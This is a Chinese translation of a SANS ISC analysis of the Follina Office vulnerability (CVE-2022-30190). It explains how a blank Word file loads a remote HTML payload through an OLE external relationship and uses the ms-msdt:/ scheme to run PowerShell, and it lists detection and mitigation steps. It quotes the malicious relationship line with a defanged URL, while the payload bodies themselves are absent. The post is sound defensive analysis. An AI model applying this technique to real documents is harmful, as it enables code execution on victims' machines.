通过 ms-msdt 可攻击 Microsoft Office (CVE-2022-30190)

吉沃运营专员

原文：https://isc.sans.edu/forums/diar ... CVE202230190/28694/

我们知道 Microsoft Office 文档的此新的攻击方法始于 @nao_sec 的一条推文，他报告了一个有趣的 Word 文档。 一直以来，Office 文档是传播恶意软件的载体。我们必须与 VBA 宏、XLS 4 宏、嵌入式 payload 等作斗争，但这里的描述很有趣。

此文件在 VT 上目前只有 17 家引擎报红 (https://www.virustotal.com/gui/f ... aec096784/detection)

当打开文件时，什么都没有显示 (它看起来像一个空白文档)，但是，查看文档规范，会看到一些有趣的东西：该文档包含指向恶意 URL 的外部引用：

1. <Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="hxxps://www[.]xmlformats[.]com/office/word/2022/wordprocessingDrawing/RDF842l.html!" TargetMode="External"/>

复制代码

当打开文档并激活内容时，将访问 www[.]xmlformats[.]com，获取以下 payload：



有趣的部分是 windows.location.href。协议架构是 "ms-msdt:/" (注意单斜杠)。这个 MSDT 或 "Microsoft 支持诊断工具" 是什么？msdt.exe 是 Microsoft 提供的一种工具，作用是收集信息以发送给 Microsoft 支持[3]。

Microsoft Office 将自动处理 MSDT URL 并执行 Powershell payload。Base64 包含以下内容：



即使宏被禁用，受保护的视图功能也会发挥作用。但是，Kevin Beaumont 测试了转换为 RTF 形式的文档。即使在 Windows 资源管理器 中预览文档，它也能正常工作。此漏洞不适用于所有 Office 版本 (至少在 Office 2013 和 2016 中)。

当我们在周末查看恶意文件时，Didier 制作了一个新的 payload，它将触发一个经典计算器作为代码执行的演示，他录制了该行为的视频：https://www.youtube.com/watch?v=GybD70_rZDs。

这种行为真的很糟糕，如何检测到这一点？请注意，文档中不存在可疑方案 ("ms-msdt:/")。它存在于将由 Office 下载的第一阶段 payload 中。这里有一些想法：

• 检查父子关系：一个好主意是跟踪从 word.exe 或 excel.exe 等父进程启动的 msdt.exe 进程；
• 从注册表中删除 "ms-msdt" 方案，Didier 进行了一些测试，并且它有效：https://twitter.com/DidierStevens/status/1531033449561264128；
• 通过创建 ASL 规则防止 Office 产生子进程：Set-MpPreference -AttackSurfaceReductionRules_Ids d4f940ab-401b-4efc-aadc-ad5f3c50688a -AttackSurfaceReductionRules_Actions Enabled；
• 当然，在培训时不要打开可疑文件；
  

我们将继续关注这一新的攻击方法并更新此文章，随时与我们分享您的发现。可参看以下 PPT 来了解更多细节：



参考

• https://twitter.com/nao_sec/stat ... 1e1b4764040d3dc5c07
• https://www.virustotal.com/gui/f ... aec096784/detection
• https://docs.microsoft.com/en-us ... ndows-commands/msdt
• https://doublepulsar.com/follina ... bility-1a47fce5629e
• https://www.youtube.com/watch?v=GybD70_rZDs
• https://twitter.com/DidierStevens/status/1531033449561264128